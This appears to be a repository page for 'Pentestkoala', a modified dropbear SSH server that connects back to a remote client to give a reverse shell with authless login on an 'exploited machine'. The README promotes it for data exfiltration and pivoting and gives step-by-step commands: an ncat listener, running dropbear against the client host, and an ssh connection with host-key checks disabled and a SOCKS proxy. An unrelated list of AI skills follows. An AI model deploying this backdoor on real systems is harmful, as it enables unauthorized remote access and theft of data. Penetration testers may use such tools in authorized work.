Pentestkoala
Modified dropbear server which acts as a client and allows authless login
Install / Use
/learn @mrschyte/PentestkoalaREADME
Koala is a patched version of the dropbear SSH server that instead of binding to a port opens up reverse shells by connecting to a remote client.
This is useful for gaining a pty terminal on an exploited machine and also for secure exfiltration of data via SSH port forwarding. Pivoting can also be done by using the dynamic SSH port forwarding feature.
[Usage]
Run the following command on the client to listen for the SSH connection: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
On the exploited host run: $ ./dropbear -p client-host:5000
Now on the client, connect to port 9999 to open up a shell: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999
Related Skills
node-connect
349.2kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
109.5kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
349.2kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
349.2kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
